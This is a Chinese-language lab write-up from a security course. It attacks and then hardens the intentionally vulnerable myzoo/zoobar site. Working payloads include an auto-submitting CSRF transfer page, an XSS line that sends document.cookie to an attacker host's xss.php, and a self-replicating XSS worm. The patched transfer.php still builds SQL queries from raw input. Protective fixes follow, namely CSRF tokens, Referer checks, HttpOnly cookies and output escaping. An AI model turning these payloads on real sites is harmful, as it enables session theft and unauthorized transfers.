資訊安全實踐Lab3-CSRF&XSS&Click Jacking
該實驗可以在一臺虛擬機上完成,本文采用兩臺虛擬機的方式,myzoo網站所在虛擬機ip:10.211.55.14 , 攻擊者網站所在虛擬機ip:10.211.55.16 ,
CSRF
在zoobar網站上展示并防御CSRF攻擊,請注意在防御時的粒度問題,防止所有人的token都一樣;以及重繪太快,正常操作都失敗,
配置
先在myzoo網站注冊兩個賬號 victim和csrfattack,
攻擊者服務器所在虛擬機配置(10.211.55.16):
1.安裝apache2
sudo apt-get install apache2
2.關閉防火墻
sudo ufw disable
3.配置hosts
sudo vim /etc/hosts
在最后添加
10.211.55.14 www.myzoo.com #這里的ip填寫myzoo服務器的ip地址
127.0.0.1 www.attack.com
4.撰寫index.html檔案
sudo cd /var/www/html
sudo vim index.html
將下面的內容復制進去即可
index.html
<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>
<title>my profile</title>
</head>
<body>
<iframe name="it" style="display:none" width="600px" height="450px"></iframe>
<form method="POST"
name="transferform"
action="http://www.myzoo.com/transfer.php"
target="it"
id="transferform"
style="display:none">
<input name="zoobars" type="text" value="1" size="5">
<input name="recipient" type="text" value="csrfattack">
<input type="hidden" name="submission" value="Send">
</form>
<img src="http://106.13.136.87:8080/101.jpeg">
<script type="text/javascript">
form = document.getElementById("transferform");
form.submit();
</script>
</body>
</html>
myzoo網站所在虛擬機配置(10.211.55.14):
1.關閉防火墻
sudo ufw disable
2.配置hosts
sudo vim /etc/hosts
在最后添加
127.0.0.1 www.myzoo.com
10.211.55.16 www.attack.com #這里的ip填寫攻擊者服務器的ip地址
攻擊
1.在csrfattack賬號的profile中寫入:
<a href="http://www.attack.com"> 點擊查看我的照片哦</a>
然后點擊save,
2.在10.211.55.14上登錄victim賬戶,victim用戶去查看csrfattack的profile
當victim點擊該鏈接后,就會向csrfattack轉1個zoobars,
防御
方法1:使用session
修改transfer.php檔案:
1.在開頭加入下面的內容
<?php
session_start();
?>
2.修改if陳述句
if($_POST['submission'] && $_POST['token'] == $_SESSION['csrf'])
3.在45-47行加入下面內容
<?php
$_SESSION['csrf'] = md5(uniqid(mt_rand(), true));
?>
4.在form中添加下面的內容
<input type=hidden name=token value="<?php echo $_SESSION['csrf']?>"/>
修改后的transfer.php如下:
<?php
session_start();
?>
<?php
require_once("includes/common.php");
nav_start_outer("Transfer");
nav_start_inner();
if($_POST['submission'] && $_POST['token'] == $_SESSION['csrf']) {
$recipient = $_POST['recipient'];
$zoobars = (int) $_POST['zoobars'];
$sql = "SELECT Zoobars FROM Person WHERE PersonID=$user->id";
$rs = $db->executeQuery($sql);
$rs = mysql_fetch_array($rs);
$sender_balance = $rs["Zoobars"] - $zoobars;
$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
$rs = $db->executeQuery($sql);
$rs = mysql_fetch_array($rs);
$recipient_exists = $rs["PersonID"];
if($zoobars > 0 && $sender_balance >= 0 && $recipient_exists) {
$sql = "UPDATE Person SET Zoobars = $sender_balance " .
"WHERE PersonID=$user->id";
$db->executeQuery($sql);
$sql = "SELECT Zoobars FROM Person WHERE Username='$recipient'";
$rs = $db->executeQuery($sql);
$rs = mysql_fetch_array($rs);
$recipient_balance = $rs["Zoobars"] + $zoobars;
$sql = "UPDATE Person SET Zoobars = $recipient_balance " .
"WHERE Username='$recipient'";
$db->executeQuery($sql);
$result = "Sent $zoobars zoobars";
}
else $result = "Transfer to $recipient failed.";
}
?>
<p><b>Balance:</b>
<span id="myZoobars"> <?php
$sql = "SELECT Zoobars FROM Person WHERE PersonID=$user->id";
$rs = $db->executeQuery($sql);
$rs = mysql_fetch_array($rs);
$balance = $rs["Zoobars"];
echo $balance > 0 ? $balance : 0;
?> </span> zoobars</p>
<?php
$_SESSION['csrf'] = md5(uniqid(mt_rand(), true));
?>
<form method=POST name=transferform
action="<?php echo $_SERVER['PHP_SELF']?>">
<p>Send <input name=zoobars type=text value="<?php
echo $_POST['zoobars'];
?>" size=5> zoobars</p>
<p>to <input name=recipient type=text value="<?php
echo $_POST['recipient'];
?>"></p>
<input type=hidden name=token value="<?php echo $_SESSION['csrf']?>"/>
<input type=submit name=submission value="Send">
</form>
<span class=warning><?php
echo "$result";
?></span>
<?php
nav_end_inner();
?>
<script type="text/javascript" src="zoobars.js.php"></script>
<?php
nav_end_outer();
?>
方法2:驗證HTTP Referer
修改transfer.php檔案:
1.修改if陳述句
if($_POST['submission'] && $_SERVER['HTTP_REFERER'] == "http://www.myzoo.com/transfer.php")
XSS
在zoobar網站上展示并防御XSS攻擊,請注意實作cookie竊取、以及xss蠕蟲,
如果不修改myzoo/user.php原始碼,很難實作XSS攻擊
修改 myzoo/user.php原始碼
$allowed_tags =
'<script><a><br><b><h1><h2><h3><h4><i><img><li><ol><p><strong><table>' .
'<tr><td><th><u><ul><em><span>';
$disallowed =
'eval|setTimeout|setInterval|target|'.
'onAbort|onBlur|onChange|onClick|onDblClick|'.
'onDragDrop|onFocus|onKeyDown|onKeyPress|'.
'onKeyUp|onLoad|onMouseDown|onMouseMove|onMouseOut|'.
'onMouseOver|onMouseUp|onMove|onReset|onResize|'.
'onSelect|onSubmit|onUnload';
cookie竊取
配置
在myzoo網站創建賬號xssattack,
攻擊者虛擬機配置(10.211.55.16)
1.創建xss.php檔案
sudo vim /var/www/html/xss.php
將下面的內容復制進去
<?php
$cookie = $_GET['cookie'];
if(isset($cookie)){
echo 'get cookie: '.$cookie;
}else{
echo 'not get cookie';
}
?>
攻擊
修改xssattack賬號的profile
<img src=x οnerrοr=javascript:window.open("http://www.attack.com/xss.php?cookie="+document.cookie) />
用戶victim訪問xssattack,就會彈出一個頁面里面會列印獲取到的cookie值,
防御
方法一:設定httponly
如果cookie中設定了HttpOnly屬性,那么通過js腳本將無法讀取到cookie資訊,這樣能有效的防止XSS攻擊,竊取cookie內容,這樣就增加了cookie的安全性,
1.修改auth.php檔案
// setcookie($this->cookieName, $cookieData, time() + 31104000);
setcookie($this->cookieName, $cookieData, time() + 31104000,NULL,NULL,NULL,true);
方法二:禁用標簽
XSS蠕蟲
攻擊
進行這個攻擊前需要把csrf的的防御給去掉,
注冊賬號xssattack1
修改xssattack1的profile
<span id="hack">
<script>
xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST","http://www.myzoo.com/transfer.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("zoobars=1&recipient=xssattack1&submission=Send");
xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST","http://www.myzoo.com/index.php",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
str = "<span id=hack>"
str += document.getElementById("hack").innerHTML + "</span>";
str = encodeURIComponent(str);
str = "profile_submit=Save&profile_update=" + str;
xmlhttp.send(str);
</script>
</span>
當其他用戶訪問xssattack1時,就會給xssattack1轉1個zoobars,并且復制xssattack1的profile復制到自己的profile,
防御
方法1:輸入過濾
輸入過濾比較好理解,可以通過設定白名單或者黑名單,將一些可能造成攻擊的標簽都過濾;
方法2:輸出轉義
輸出轉義,主要是因為輸入的惡意代碼,如果保存在網站的資料庫中,最終都是有一個輸出的程序然后才能獲得執行,那么就在從資料庫取出,并展示在網頁之前,對所有的內容進行轉義,PHP中htmlentities() 函式把字符轉換為 HTML 物體,HTML物體(character entities)的目的是正確地顯示預留字符,譬如如果想要在網頁上輸出<br>,如果直接在HTML中寫<br>,瀏覽器會自動將它當做代碼,而不是字串,此時就需要,將<和>轉換為物體,也即< 或 <,也即,通過htmlentities,所有的攻擊代碼,不管怎么構造的,都會被變成普通的字符,而不會造成攻擊效果,
修改users.php檔案
$profile = strip_tags($profile, $allowed_tags);
$profile = htmlentities($profile); //在users.php中加入這行代碼即可
Click Jacking
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/245712.html
標籤:其他
上一篇:圖論模板,不定期更新